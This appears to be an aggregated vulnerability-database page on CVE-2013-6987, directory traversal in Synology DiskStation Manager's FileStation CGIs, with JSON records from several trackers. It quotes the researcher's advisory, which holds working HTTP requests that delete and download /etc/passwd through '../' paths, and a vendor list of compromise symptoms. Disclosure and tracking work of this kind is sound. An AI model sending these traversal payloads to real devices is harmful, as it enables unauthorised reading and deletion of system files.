CVE-2013-6987 (GCVE-0-2013-6987)

Vulnerability from cvelistv5

Published

2013-12-31 15:00

Modified

2024-08-06 17:53

Severity ?

CWE

Summary

References

URL

	Vendor	Product	Version
	n/a	n/a	Version: n/a

gsd-2013-6987

Vulnerability from gsd

Modified

2023-12-13 01:22

Details

Aliases

CVE-2013-6987

Aliases

CVE-2013-6987

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2013-6987",
    "description": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/.",
    "id": "GSD-2013-6987",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2013-6987"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2013-6987"
      ],
      "details": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/.",
      "id": "GSD-2013-6987",
      "modified": "2023-12-13T01:22:19.398838Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2013-6987",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "64483",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/64483"
          },
          {
            "name": "synologydsm-cve20136987-directory-traversal(89892)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89892"
          },
          {
            "name": "http://www.synology.com/en-us/releaseNote/model/DS114",
            "refsource": "CONFIRM",
            "url": "http://www.synology.com/en-us/releaseNote/model/DS114"
          },
          {
            "name": "http://packetstormsecurity.com/files/124563",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/124563"
          },
          {
            "name": "30475",
            "refsource": "EXPLOIT-DB",
            "url": "http://www.exploit-db.com/exploits/30475"
          },
          {
            "name": "20131220 Synology DSM multiple directory traversal",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2013/Dec/177"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:4.3-3810:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-6987"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-22"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.synology.com/en-us/releaseNote/model/DS114",
              "refsource": "CONFIRM",
              "tags": [],
              "url": "http://www.synology.com/en-us/releaseNote/model/DS114"
            },
            {
              "name": "30475",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.exploit-db.com/exploits/30475"
            },
            {
              "name": "http://packetstormsecurity.com/files/124563",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://packetstormsecurity.com/files/124563"
            },
            {
              "name": "20131220 Synology DSM multiple directory traversal",
              "refsource": "FULLDISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://seclists.org/fulldisclosure/2013/Dec/177"
            },
            {
              "name": "64483",
              "refsource": "BID",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.securityfocus.com/bid/64483"
            },
            {
              "name": "synologydsm-cve20136987-directory-traversal(89892)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89892"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2017-08-29T01:34Z",
      "publishedDate": "2013-12-31T16:04Z"
    }
  }
}

ghsa-qc6v-4m2q-7q39

Vulnerability from github

Published

2022-05-17 01:30

Modified

2022-05-17 01:30

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2013-6987"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2013-12-31T16:04:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/.",
  "id": "GHSA-qc6v-4m2q-7q39",
  "modified": "2022-05-17T01:30:03Z",
  "published": "2022-05-17T01:30:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-6987"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89892"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/124563"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2013/Dec/177"
    },
    {
      "type": "WEB",
      "url": "http://www.exploit-db.com/exploits/30475"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/64483"
    },
    {
      "type": "WEB",
      "url": "http://www.synology.com/en-us/releaseNote/model/DS114"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/. Synology DiskStation Manager (DSM) of FileBrowser The component contains a directory traversal vulnerability.By a third party .. ( Dot dot ) including webapi/FileStation/ Arbitrary files may be read, written, and deleted via the following parameters in. Synology DiskStation Manager is prone to a multiple directory-traversal vulnerabilities. Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to bypass security restrictions and perform unauthorized actions on system and configuration files in the context of the application. Synology DiskStation Manager 4.3-3810 and prior are vulnerable. The operating system can manage data, documents, photos, music and other information. The vulnerability is caused by (1) the file_delete.cgi script does not filter the 'path' parameter correctly; (2) the file_share in the webapi/FileStation/ directory .cgi script does not filter 'folder_path' parameter correctly; (3) fbdownload/ directory does not filter 'dlink' parameter correctly; (4) html5_upload.cgi, file_download.cgi, file_sharing.cgi, file_MVCP.cgi and The file_rename.cgi script did not properly filter parameters. ********** Title: Synology DSM multiple directory traversal Version affected: <= 4.3-3810 Vendor: Synology Discovered by: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Web: http://www.andreafabrizi.it Twitter: @andreaf83 Status: patched CVE: 2013-6987

I'm again here with a Synology DSM vulnerability.

Synology DiskStation Manager (DSM) it's a Linux based operating system, used for the DiskStation and RackStation products. This kind of vulnerability allows any authenticated user, even if not administrative, to access, create, delete, modify system and configuration files.

The only countermeasure implemented against this vulnerability is the check that the path starts with a valid shared folder, so is enough to put the "../" straight after, to bypass the security check.

Vulnerables CGIs: - /webapi/FileStation/html5_upload.cgi - /webapi/FileStation/file_delete.cgi - /webapi/FileStation/file_download.cgi - /webapi/FileStation/file_sharing.cgi - /webapi/FileStation/file_share.cgi - /webapi/FileStation/file_MVCP.cgi - /webapi/FileStation/file_rename.cgi

Not tested all the CGI, but I guess that many others are vulnerable, so don't take my list as comprehensive.

Following some examples ("test" is a valid folder name):

- Delete /etc/passwd

POST /webapi/FileStation/file_delete.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: XXXXXXXX Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 103 Cookie: stay_login=0; id=kjuYI0HvD92m6 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1

- Arbitrary file download:

GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1 Host: 192.168.56.101:5000 Connection: keep-alive Authorization: Basic XXXXXXXX ===========================================

2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd

- Remote file list:

POST /webapi/FileStation/file_share.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: XXXXXXXX Content-Length: 75 Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2

folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1

Timeline: - 05/12/2013: First contact with the vendor - 06/12/2013: Vulnerability details sent to the vendor - 20/12/2013: Patch released by the vendor

http://www.synology.com/en-global/company/news/article/437

February 14, 2014\x97Synology\xae confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly.

The followings are possible symptoms to appear on affected DiskStation and RackStation:

Exceptionally high CPU usage detected in Resource Monitor:
CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their names
Appearance of non-Synology folder:
An automatically created shared folder with the name \x93startup\x94, or a non-Synology folder appearing under the path of \x93/root/PWNED\x94
Redirection of the Web Station:
\x93Index.php\x94 is redirected to an unexpected page
Appearance of non-Synology CGI program:
Files with meaningless names exist under the path of \x93/usr/syno/synoman\x94
Appearance of non-Synology script file:
Non-Synology script files, such as \x93S99p.sh\x94, appear under the path of \x93/usr/syno/etc/rc.d\x94

If users identify any of above situation, they are strongly encouraged to do the following:

For DiskStation or RackStation running on DSM 4.3, please follow the instruction here (http://www.synology.com/en-global/support/faq/348) to REINSTALL DSM 4.3-3827. 
For DiskStation or RackStation running on DSM 4.0, it\x92s recommended to REINSTALL DSM 4.0-2259 or onward from Synology Download Center. 
For DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it\x92s recommended to REINSTALL DSM 4.2-3243 or onward from Synology Download Center (http://www.synology.com/en-global/support/download).

Confidentiality Impact Complete (There is total information disclosure, resulting in all system files being revealed.) Integrity Impact Complete (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.) Availability Impact Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.) Access Complexity Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. ) Authentication Not required (Authentication is not required to exploit the vulnerability.) Gained Access None Vulnerability Type(s) Execute Code

This is also known as the /PWNED or /lolz hack

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0278",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "diskstation manager",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "synology",
        "version": "4.3-3810"
      },
      {
        "model": "diskstation manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "synology",
        "version": "4.3-3810 update 3"
      },
      {
        "model": "diskstation manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "synology",
        "version": "4.3"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "64483"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:synology:diskstation_manager",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Andrea Fabrizi",
    "sources": [
      {
        "db": "BID",
        "id": "64483"
      },
      {
        "db": "PACKETSTORM",
        "id": "124563"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2013-6987",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-6987",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-66989",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-6987",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-6987",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-538",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-66989",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2013-6987",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/. Synology DiskStation Manager (DSM) of FileBrowser The component contains a directory traversal vulnerability.By a third party .. ( Dot dot ) including webapi/FileStation/ Arbitrary files may be read, written, and deleted via the following parameters in. Synology DiskStation Manager is prone to a multiple directory-traversal vulnerabilities. \nRemote attackers can use a specially crafted request with directory-traversal sequences (\u0027../\u0027) to bypass security restrictions and perform unauthorized actions on system and configuration files in the context of the application. \nSynology DiskStation Manager 4.3-3810 and prior are vulnerable. The operating system can manage data, documents, photos, music and other information. The vulnerability is caused by (1) the file_delete.cgi script does not filter the \u0027path\u0027 parameter correctly; (2) the file_share in the webapi/FileStation/ directory .cgi script does not filter \u0027folder_path\u0027 parameter correctly; (3) fbdownload/ directory does not filter \u0027dlink\u0027 parameter correctly; (4) html5_upload.cgi, file_download.cgi, file_sharing.cgi, file_MVCP.cgi and The file_rename.cgi script did not properly filter parameters. **************************************************************\nTitle: Synology DSM multiple directory traversal\nVersion affected: \u003c= 4.3-3810\nVendor: Synology\nDiscovered by: Andrea Fabrizi\nEmail: andrea.fabrizi@gmail.com\nWeb: http://www.andreafabrizi.it\nTwitter: @andreaf83\nStatus: patched\nCVE: 2013-6987\n**************************************************************\n\nI\u0027m again here with a Synology DSM vulnerability. \n\nSynology DiskStation Manager (DSM) it\u0027s a Linux based operating\nsystem, used for the DiskStation and RackStation products. \nThis kind of vulnerability allows any authenticated user, even if not\nadministrative, to access, create, delete, modify system and\nconfiguration files. \n\nThe only countermeasure implemented against this vulnerability is the\ncheck that the path starts with a valid shared folder, so is enough to\nput the \"../\" straight after, to bypass the security check. \n\nVulnerables CGIs:\n- /webapi/FileStation/html5_upload.cgi\n- /webapi/FileStation/file_delete.cgi\n- /webapi/FileStation/file_download.cgi\n- /webapi/FileStation/file_sharing.cgi\n- /webapi/FileStation/file_share.cgi\n- /webapi/FileStation/file_MVCP.cgi\n- /webapi/FileStation/file_rename.cgi\n\nNot tested all the CGI, but I guess that many others are vulnerable,\nso don\u0027t take my list as comprehensive. \n\nFollowing some examples (\"test\" is a valid folder name):\n\n- Delete /etc/passwd\n===========================================\nPOST /webapi/FileStation/file_delete.cgi HTTP/1.1\nHost: 192.168.56.101:5000\nX-SYNO-TOKEN: XXXXXXXX\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 103\nCookie: stay_login=0; id=kjuYI0HvD92m6\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\npath=/test/../../etc/passwd\u0026accurate_progress=true\u0026api=SYNO.FileStation.Delete\u0026method=start\u0026version=1\n===========================================\n\n- Arbitrary file download:\n===========================================\nGET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1\nHost: 192.168.56.101:5000\nConnection: keep-alive\nAuthorization: Basic XXXXXXXX\n===========================================\n\n2f746573742f2e2e2f2e2e2f6574632f706173737764 -\u003e /test/../../etc/passwd\n\n- Remote file list:\n=========================\nPOST /webapi/FileStation/file_share.cgi HTTP/1.1\nHost: 192.168.56.101:5000\nX-SYNO-TOKEN: XXXXXXXX\nContent-Length: 75\nCookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2\n\nfolder_path=/test/../../tmp\u0026api=SYNO.FileStation.List\u0026method=list\u0026version=1\n==========================\n\nTimeline:\n- 05/12/2013: First contact with the vendor\n- 06/12/2013: Vulnerability details sent to the vendor\n- 20/12/2013: Patch released by the vendor\n\n\n. \n\nhttp://www.synology.com/en-global/company/news/article/437\n\nFebruary 14, 2014\\x97Synology\\xae confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly. \n\nThe followings are possible symptoms to appear on affected DiskStation and RackStation:\n\n    Exceptionally high CPU usage detected in Resource Monitor:\n    CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their names\n    Appearance of non-Synology folder:\n    An automatically created shared folder with the name \\x93startup\\x94, or a non-Synology folder appearing under the path of \\x93/root/PWNED\\x94\n    Redirection of the Web Station:\n    \\x93Index.php\\x94 is redirected to an unexpected page\n    Appearance of non-Synology CGI program:\n    Files with meaningless names exist under the path of \\x93/usr/syno/synoman\\x94\n    Appearance of non-Synology script file:\n    Non-Synology script files, such as \\x93S99p.sh\\x94, appear under the path of \\x93/usr/syno/etc/rc.d\\x94\n\nIf users identify any of above situation, they are strongly encouraged to do the following:\n\n    For DiskStation or RackStation running on DSM 4.3, please follow the instruction here (http://www.synology.com/en-global/support/faq/348) to REINSTALL DSM 4.3-3827. \n    For DiskStation or RackStation running on DSM 4.0, it\\x92s recommended to REINSTALL DSM 4.0-2259 or onward from Synology Download Center. \n    For DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it\\x92s recommended to REINSTALL DSM 4.2-3243 or onward from Synology Download Center (http://www.synology.com/en-global/support/download). \n\nConfidentiality Impact \tComplete (There is total information disclosure, resulting in all system files being revealed.)\nIntegrity Impact \tComplete (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.)\nAvailability Impact \tComplete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.)\nAccess Complexity \tLow (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )\nAuthentication \tNot required (Authentication is not required to exploit the vulnerability.)\nGained Access \tNone\nVulnerability Type(s) \tExecute Code\n\nThis is also known as the /PWNED or /lolz hack",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-6987"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "db": "BID",
        "id": "64483"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "db": "PACKETSTORM",
        "id": "124563"
      },
      {
        "db": "PACKETSTORM",
        "id": "125864"
      }
    ],
    "trust": 2.25
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-66989",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=30475",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-6987",
        "trust": 3.1
      },
      {
        "db": "BID",
        "id": "64483",
        "trust": 2.1
      },
      {
        "db": "PACKETSTORM",
        "id": "124563",
        "trust": 1.9
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30475",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538",
        "trust": 0.7
      },
      {
        "db": "FULLDISC",
        "id": "20131220 SYNOLOGY DSM MULTIPLE DIRECTORY TRAVERSAL",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "89892",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "20136987",
        "trust": 0.6
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-83858",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-66989",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-6987",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "125864",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66989"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-6987"
      },
      {
        "db": "BID",
        "id": "64483"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005755"
      },
      {
        "db": "PACKETSTORM",
        "id": "124563"
      },
      {
        "db": "PACKETSTORM",
        "id": "125864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-538"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6987"
      }
    ]
  },
  "id": "VAR-201312-0278",
  "iot": {
    "@context": {
